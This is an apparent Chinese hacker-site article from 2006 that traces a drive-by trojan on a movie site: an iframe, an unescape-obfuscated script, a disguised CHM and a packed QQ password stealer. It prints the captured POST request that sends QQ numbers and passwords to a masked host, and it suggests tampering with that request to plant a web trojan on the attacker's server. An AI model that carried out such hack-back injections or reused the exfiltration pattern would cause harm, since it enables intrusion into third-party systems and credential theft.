黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 黑客入侵 >> 正文
·完美空间提供500M免费AS04-10·企业安全之YY内网准入以04-09
·企业安全之意识与策略04-09·剑走偏锋:IIS漏洞利用04-09
·我来免费网提供100M免费04-09·1122mb.com提供20G超大免04-08
·映像劫持与反劫持技术04-07·让所有"暴力删除工具"无04-07
·入侵88red系统的详细过程04-07·Sql Injection脚本注入终04-07
·vbs+delphi 反弹后门生成04-07·飞讯网提供100MB免费PHP04-07
·突破SQL注入攻击时输入框04-04·结合内核和病毒技术的最04-04
·Real Player rmoc3260.d04-04·亿万网络今月最后为您提04-04
·php+mysql 5 sql inject04-03·Real Player rmoc3260.d04-03
·oblog文件下载漏洞04-03·免费啦提供1G-2G免费全能04-03
·完全解析网页后门和挂马04-02·一句话开3389(只测试过04-02
·萧萧免费空间网提供100M04-02·谷道免费空间网提供1G免04-01
·从本地入手解决双线路由03-31·sablog 1.6 多个跨站漏洞03-31
·富文本编辑器的跨站脚本03-31·Cookie注入是怎样产生的03-31
[图文]实战反击入侵挂马者
      ★★★★

实战反击入侵挂马者

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-6-1 9:43:05
本文仅提供思路,转载请注明:善解人衣9011 From HackBase

这天在有问必答区看帖,有个会员问到怎么处理防盗链的问题,OK,打开网址看看,是个影院系统。突然,弹了个CMD出来...不妙...果然...不一会儿可爱的QQ消失了...还好,在NB,重启就行了..呵呵,正愁没好的QQ,开始反击!!!

用迅雷下了网页下来,用记事本打开,搜索iframe,找到了,呵呵...



一看就知道不是什么好东西...继续下载这个网页,用记事本打开,如图:



看到那个unescape吗,找个解密网站解密就行...解密后得到一个jpg地址,继续下载



还是用记事本打开,看到最上面的ITSF吗?上百度搜了下,应该是个CHM文件,直接改为CHM后缀



然后用专门的CHM反编译工具反编译,得到2个文件,1个EXE和1个HTM,(如果你反编译后没有得到任何文件,请用UltraEdit-32打开CHM文件,找到所有的#,改为1再反编译。详细原因可以参见冰狐浪子写的《巧妙防止CHM反编译》



这个HTM直接指向这个EXE文件,接下来用UltraEdit-32打开EXE文件,看开头:



007加的壳,下一步想办法脱壳。只可惜偶不会脱这个...如果你RP比我好,找了个垃圾壳,直接脱壳就可以找他的发送信息了...

PS:如果你已经光荣中马也没关系,拿出抓包器,找到可疑进程,抓包就行,这里不抓图了,看看报文:

POST /a/qz/a.asp HTTP/1.1..Accept: Accept: */*, /a/qz/a.asp, www.XXX.com..Content-Type: application/x-www-form-urlencoded..User-Agent: MyApp..Host: www.XXX.com..Content-Length: 31..Cache-Control: no-cache....num=QQ号&pass=密码

号和QQ密码都出来了,接下来下载他的接受文件,找到那个TXT文件就行...这个文件好象没有任何过滤,修改下数据包,把num=后背加上你的网页木马,或许就可以挂马了...

E-mail收信可以采用同样办法抓包,得到的数据是base64加密的,解密后就可找到邮箱的用户名和密码,剩下的就不归我管呵...
文章录入:cainiaowang    责任编辑:sygbox 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    一次通过 Oracle8i 入侵系统之旅03-21
    SA权限下的思路变通03-18
    有防火墙的网站整个入侵过程01-21
    绕过Xplog70.dll玩入侵01-14
    一步一步的入侵----only for you01-09
    入侵中快速获得Web根目录的技巧01-09
    记一次对RedHat Linux系统的安全01-08
    介绍几个小工具和入侵的技法(2)01-08
    有防火墙的网站整个入侵过程01-04
    拐弯入侵虚拟主机01-04
    由一次入侵实例看虚拟主机系统的01-02
    解读IDS入侵检测系统术语01-02
    相 关 文 章
    入侵88red系统的详细过程
    内网入侵windows xp的思路和方法
    一次通过 Oracle8i 入侵系统之旅
    几个用过的经典入侵技巧整理
    php渗透入侵过程图文详解
    DJ网站的入侵详细过程
    再次入侵嘉缘人才系统网站
    2月份风讯整站系统最新漏洞
    Mysql5注射技巧总结
    对红色黑客联盟的一次检测
    有防火墙的网站整个入侵过程
    入侵网站必备经典语句
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886